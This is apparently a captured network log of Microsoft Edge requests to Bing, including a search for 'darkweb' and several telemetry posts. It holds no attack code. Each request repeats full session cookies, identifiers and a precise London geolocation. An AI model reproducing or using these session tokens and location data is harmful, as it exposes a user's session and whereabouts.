cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

content-type: text/html; charset=utf-8
cache-control: private, max-age=0
content-encoding: br
expires: Wed, 04 Dec 2024 10:07:59 GMT
vary: Accept-Encoding
x-eventid: 67502a3b36cd4b05b5788c424e6c55fc
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
strict-transport-security: max-age=31536000; includeSubDomains; preload
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-wuE31qmwBK1oyaDVuK5upsKspfNgEETVwOTQ1nlVQIo='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingserp&ndcParam=QWthbWFp"}]}
report-to: {"group":"crossorigin-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingserp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0,"include_subdomains":true}
cross-origin-embedder-policy-report-only: 'require-corp; report-to=\"crossorigin-errors\"'
cross-origin-opener-policy-report-only: 'same-origin; report-to=\"crossorigin-errors\"'
date: Wed, 04 Dec 2024 10:08:59 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306939.7f1dd24
set-cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1; Domain=.bing.com; Path=/; Expires=Wed, 04 Dec 2024 12:08:59 GMT; Max-Age=7200; Secure
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A7%2C%20%5C%22GL%5C%22%3A4%2C%20%5C%22IG%5C%22%3A%5C%22A037B2EE115C4454A3DBE4C379F93DDF%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1733306929677%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%2Ci%3A9%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306929717%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%2Ci%3A9%22%2C%22AsResponseLength%22%3A%22434%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306929862%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%2Ci%3A9%2Cig%3AC4C2BF1DBBC94019BA8F848A60AD7862%22%2C%22AnswerInfo%22%3A%22OS%3B8%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306929862%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A7%2C%20%5C%22GL%5C%22%3A4%2C%20%5C%22IG%5C%22%3A%5C%22A037B2EE115C4454A3DBE4C379F93DDF%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1733306929677%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%2Ci%3A9%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306929717%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%2Ci%3A9%22%2C%22AsResponseLength%22%3A%22434%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306929862%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%2Ci%3A9%2Cig%3AC4C2BF1DBBC94019BA8F848A60AD7862%22%2C%22AnswerInfo%22%3A%22OS%3B8%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306929862%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
cache-control: max-age=0
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:59 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306939.7f1dd5d
GET

https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl= HTTP/2.0
host: www.bing.com
ect: 4g
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:59 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306939.7f1ddc7
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 5164
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:59 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306939.7f1ddca
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 650
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:00 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306940.7f1e1ad
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 270
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:00 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306940.7f1e1ae
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 664
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain
